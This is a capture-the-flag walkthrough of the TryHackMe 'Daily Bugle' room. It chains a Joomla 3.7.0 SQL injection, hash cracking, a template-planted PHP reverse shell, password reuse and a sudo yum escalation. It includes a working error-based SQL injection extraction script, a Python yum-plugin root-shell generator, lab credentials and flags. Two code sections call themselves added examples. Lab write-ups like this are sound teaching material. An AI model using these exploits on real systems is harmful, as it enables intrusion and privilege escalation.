TryHackMe Daily Bugle Writeup

Shivam Taneja
5 min read, Nov 7, 2022

Daily Bugle WalkThrough

Daily Bugle is a TryHackMe room rated hard. It chains several techniques (web enumeration, an unauthenticated SQL injection, hash cracking, credential reuse and a sudo misconfiguration) before you get root, so let's start by accessing it from here.

As always, let’s start with Nmap to enumerate Daily Bugle Machine and see which services are available on our target.

nmap -sV -sC Machine_IP

After the scan finishes, you should get something similar to the following

Starting Nmap 7.80 ( https://nmap.org ) at 2022-10-12 08:55 EDT
Nmap scan report for 10.10.226.51
Host is up (0.27s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
|   256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_  256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.63 seconds

From the results we can see the following:

  • SSH (OpenSSH 7.4) is open on port 22; the ssh-hostkey lines are the server's host key fingerprints and say nothing about whether password login is allowed
  • HTTP (Apache 2.4.6 on CentOS, PHP 5.6.40) is open on port 80, so we can browse to it
  • there is a robots.txt file that discloses a number of directories
  • the /administrator/ and /joomla/administrator/ entries tell us the CMS is Joomla

Let's start by opening the site in the browser. The home page already answers the first question:

Access the web server, who robbed the bank?

spiderman

There's nothing more on the home page, and the page source holds nothing of interest either.

Let's check robots.txt next: apart from the disallowed paths we already saw in the Nmap output, the only thing of note is the admin login page at /administrator/.

Before we start brute forcing anything, the next question asks for the Joomla version. JoomScan is a scanner that enumerates Joomla installations and reports the version (it reads it from files such as /administrator/manifests/files/joomla.xml, which you can also open in the browser to confirm the result).

On Kali the package name is lowercase, so install it with

sudo apt install joomscan

and then run the tool against the target:

joomscan -u http://Machine_IP

from the results of the scan, we will get the next answer.

What is the Joomla version?

3.7.0

While the tool finishes scanning (it turns up nothing else we don't already know), let's search exploit-db for known vulnerabilities in this version that could get us into the CMS.

searchsploit joomla 3.7.0

and what do you know, searchsploit lists two entries for 3.7.0, one of them an SQL injection (CVE-2017-8917) in the com_fields component:

https://www.exploit-db.com/exploits/42033

The advisory shows that an unauthenticated GET to index.php?option=com_fields&view=fields&layout=modal drops the list[fullordering] parameter unsanitised into an ORDER BY clause. You can hand that to sqlmap with the command below, but at this risk and level it takes a long time:

sqlmap -u "http://Machine_IP/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

There's a hint that we should use a Python script instead, so I searched online for a Joomla 3.7.0 SQL injection exploit written in Python and found the following script on GitHub.

so let’s get the script

https://github.com/NinjaJc01/joomblah-3

and then let's run it against our target. You should get something similar to this (the tuple-style lines are a leftover of the script's Python 2 origins):

[-] Fetching CSRF token
[-] Testing SQLi
(' -  Found table:', 'fb9j5_users')
(' -  Extracting users from', 'fb9j5_users')
(' [$] Found user', ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', ''])
(' -  Extracting sessions from', 'fb9j5_session')
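What joomblah and the sqlmap command above are doing under the hood is error-based extraction: the injected updatexml() call hands MySQL an invalid XPath expression, and MySQL echoes the offending string, which we have built from the subquery result, in its error text. The script below is an added example written for this writeup; it is neither the page's nor joomblah's code. It assumes the list[fullordering] injection point from the advisory, that the target renders the database error in the response, and that MySQL shows at most 32 characters of the XPath string (which is why a 60-character bcrypt hash has to be pulled in slices). SAMPLE_HASH, CANNED and fake_server are constructed stand-ins so the whole thing runs offline; against a live host, fetch would be an HTTP GET returning the response body.

```python
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# MySQL echoes at most 32 characters of the offending XPath expression in the
# error text. The first one is our '~' marker, so each request leaks 31 bytes.
CHUNK = 31
ERR_RE = re.compile(r"XPATH syntax error: '~(.*?)'")


def payload(sql_expr, offset):
    """list[fullordering] value that leaks one slice of a subquery result.

    The value is dropped unquoted into ORDER BY (CVE-2017-8917); updatexml()
    with an invalid XPath ('~' is not a valid token) makes MySQL put the
    concatenated string into its error message.
    """
    sliced = "SUBSTRING(({}),{},{})".format(sql_expr, offset, CHUNK)
    return "updatexml(0x23,concat(0x7e,{}),1)".format(sliced)


def build_url(base, sql_expr, offset):
    """Unauthenticated GET to the vulnerable com_fields modal view."""
    params = {
        "option": "com_fields",
        "view": "fields",
        "layout": "modal",
        "list[fullordering]": payload(sql_expr, offset),
    }
    return base.rstrip("/") + "/index.php?" + urlencode(params)


def parse_chunk(body):
    """Return the leaked slice, or None when no XPATH error came back
    (patched target, errors suppressed, or the subquery returned NULL)."""
    m = ERR_RE.search(body)
    return m.group(1) if m else None


def extract(fetch, base, sql_expr, max_len=1024):
    """Pull a whole value slice by slice. fetch(url) -> response body; in
    practice that is an HTTP GET, here it is the offline stand-in below."""
    result, offset = "", 1
    while offset <= max_len:
        chunk = parse_chunk(fetch(build_url(base, sql_expr, offset)))
        if chunk is None:
            raise RuntimeError("no XPATH error in response; injection did not fire")
        result += chunk
        if len(chunk) < CHUNK:  # a short slice means we reached the end
            break
        offset += CHUNK
    return result


# --- Offline stand-in for the target. Constructed data, not from the box. ---
SAMPLE_HASH = "$2y$10$" + ("bcryptSALTandDIGEST." * 3)[:53]  # 60 chars, like a real $2y$ hash
CANNED = {  # subquery text -> what the database would return
    "SELECT password FROM fb9j5_users WHERE username='jonah'": SAMPLE_HASH,
    "SELECT username FROM fb9j5_users WHERE id=811": "jonah",
}
SUB_RE = re.compile(r"SUBSTRING\(\((.*?)\),(\d+),(\d+)\)")


def fake_server(url):
    """Mimic the vulnerable page: evaluate the SUBSTRING() slice against
    CANNED and emit the error exactly as MySQL would, 32-char cap included."""
    ordering = parse_qs(urlsplit(url).query)["list[fullordering]"][0]
    m = SUB_RE.search(ordering)
    value = CANNED.get(m.group(1)) if m else None
    if value is None:  # NULL concat -> updatexml() returns NULL, no error text
        return "<html><body>500 Internal Server Error</body></html>"
    off, length = int(m.group(2)), int(m.group(3))
    shown = ("~" + value[off - 1:off - 1 + length])[:32]
    return "<html><body>1105 XPATH syntax error: '{}'</body></html>".format(shown)


if __name__ == "__main__":
    sql = "SELECT password FROM fb9j5_users WHERE username='jonah'"
    print(build_url("http://10.10.226.51", sql, 1))
    print(extract(fake_server, "http://10.10.226.51", sql))
```

The loop stops on the first slice shorter than CHUNK, which also covers values whose length is an exact multiple of 31 (the next request simply comes back empty). If the response carries no XPATH error at all, the injection did not fire: either the target is patched, PHP error display is off, or the subquery returned NULL, which concat() turns into NULL and updatexml() swallows silently.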

so we have a username (jonah) and his password hash, a bcrypt hash ($2y$, cost 10). Save the hash to a file and crack it with John the Ripper against rockyou; bcrypt at this cost is slow, so expect it to take a while:

john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt password_joomla

and we would get the next answer

What is Jonah’s cracked password?

spiderman123

Now let's log in to the Joomla administrator panel at /administrator/ as jonah.

After logging in we need code execution on the box, so we'll plant a reverse shell and use it to go after the flag.

Joomla runs on PHP, so a PHP reverse shell (pentestmonkey's php-reverse-shell with your attacking IP and port filled in is the usual choice) is what we want. The Media manager refuses .php uploads by default, so the first idea is to relax that restriction.

The settings live under Content -> Media -> Options: the "Legal Extensions (File Types)" field, and "Restrict Uploads", which you can disable as well.

In my case that didn't work, and adding "php" to "Legal Image Extensions" and "Legal MIME Types" made no difference either.

Another route is to write the code into a template file that the server already executes: go to Extensions -> Templates -> Templates and you will see the installed templates, one of them marked as the default for the site.

The template marked as default is the one serving the home page. Open it, edit its index.php (the file executed for every page request) and replace its contents with the reverse shell; keep a copy of the original, because from now on every visitor triggers the payload and the site stops rendering. Start a listener on the port you put into the shell, save the file, refresh the home page, and the shell connects back.

After we get a shell, let's head to the home directories:

cd /home

There is one user directory, jjameson, but the web server user has no permission to read it, so it's time for privilege escalation.

Let's check what sudo permissions the web server user has with

sudo -l

None at all. The next usual place is cron.

/etc/crontab has nothing interesting in it, and it is only writable by root anyway:

-rw-r--r--. 1 root root 451 Jun  9  2014 /etc/crontab

Since there's nothing there, let's look at the web root; CMS configuration files usually hold database credentials:

cd /var/www/html

and list what we have:

LICENSE.txt
README.txt
administrator
bin
cache
cli
components
configuration.php
htaccess.txt
images
includes
index.php
language
layouts
libraries
media
modules
plugins
robots.txt
templates
tmp
web.config.txt

Let's read configuration.php. You should get something similar to this:

public $display_offline_message = '1';
public $offline_image = '';
public $sitename = 'The Daily Bugle';
public $editor = 'tinymce';
public $captcha = '0';
public $list_limit = '20';
public $access = '1';
public $debug = '0';
public $debug_lang = '0';
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'root';
public $password = 'nv5uz9r3ZEDzVjNu';
public $db = 'joomla';
public $dbprefix = 'fb9j5_';
public $live_site = '';
public $secret = 'UAMBRWzHO3oFPmVC';
public $gzip = '0';
public $error_reporting = 'default';

The values worth noting are $password, the MySQL root password the CMS connects with, and $secret, Joomla's own secret key.

So we have a password that might be reused elsewhere. I tried it for the mysql and root system accounts without luck, then for jjameson, and it worked:

su jjameson

(su needs a terminal; if your reverse shell is not a full TTY, upgrade it first, for example by spawning a pty with Python, or su will refuse to run.)

and we can get our flag from here by going to the user home files

What is the user flag?

27a260fe3cba712cfdedb1c86d80442e

Now it's time to get root. Let's see which commands jjameson can run through sudo, again with sudo -l:

/usr/bin/yum

So let's check GTFOBins for a way to escalate through this binary.

GTFOBins lists two ways to get a root shell from sudo yum: (a) build a package whose install scriptlet runs your payload and install it with yum localinstall, or (b) point yum at a config file you control that loads a custom plugin, since yum plugins are Python modules whose init() hook runs as root under sudo.

I went with method (b). Once it works you have a root shell, which you can confirm with whoami.
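Method (b) in more detail, as an added example written for this writeup rather than the page's or GTFOBins' own text. yum reads its plugin directory from the config file passed with -c, loads every enabled plugin found there and calls each plugin's init() hook before doing anything else, so a plugin that execs a shell, run via sudo, lands you in a root shell. The script only writes the three files and returns the command to run; it never invokes yum itself. Assumptions: yum 3.x as shipped on CentOS 7 (Python 2, plugin API version 2.1), a sudo rule for /usr/bin/yum, and a writable directory for the files (tempfile.mkdtemp() here). The plugin source mirrors the GTFOBins entry.

```python
import os
import tempfile

# The plugin yum will import. yum calls init() on every loaded plugin before
# doing anything else, so with `sudo yum` this exec happens as root. Kept
# Python 2 compatible because CentOS 7's yum runs under Python 2.
PLUGIN_SRC = """\
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version = '2.1'   # yum refuses to load a plugin without this

def init(conduit):
    os.execl('/bin/sh', '/bin/sh')
"""


def write_yum_plugin(workdir=None, name="y"):
    """Create the three files yum needs: an alternative yum.conf that enables
    plugins and points pluginpath/pluginconfpath at our directory, the
    per-plugin config that switches it on, and the plugin module itself.
    Returns their paths; nothing here touches the real /etc/yum.conf."""
    tf = workdir or tempfile.mkdtemp()
    paths = {
        "conf": os.path.join(tf, "x"),
        "plugin_conf": os.path.join(tf, name + ".conf"),
        "plugin": os.path.join(tf, name + ".py"),
    }
    with open(paths["conf"], "w") as f:
        f.write("[main]\nplugins=1\npluginpath={0}\npluginconfpath={0}\n".format(tf))
    with open(paths["plugin_conf"], "w") as f:
        f.write("[main]\nenabled=1\n")
    with open(paths["plugin"], "w") as f:
        f.write(PLUGIN_SRC)
    return paths


def yum_command(paths, name="y"):
    """The command to run on the target as jjameson: -c swaps in our config,
    --enableplugin makes sure our plugin is loaded even if disabled."""
    return ["sudo", "yum", "-c", paths["conf"], "--enableplugin=" + name]


if __name__ == "__main__":
    files = write_yum_plugin()
    print(" ".join(yum_command(files)))
```

Run it on the box as jjameson and then execute the printed command; yum imports y.py from the directory named in pluginpath, and init() replaces the yum process with /bin/sh running as root. The same three files written with shell heredocs are what GTFOBins shows, so use whichever is handier on a box without Python 3.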

What is the root flag?

eec3d53292b1821868266858d7fa6f79

and finally, we finished Daily Bugle machine.

Written by Shivam Taneja

IT Security Consultant, Researcher, Penetration Tester & Hacker.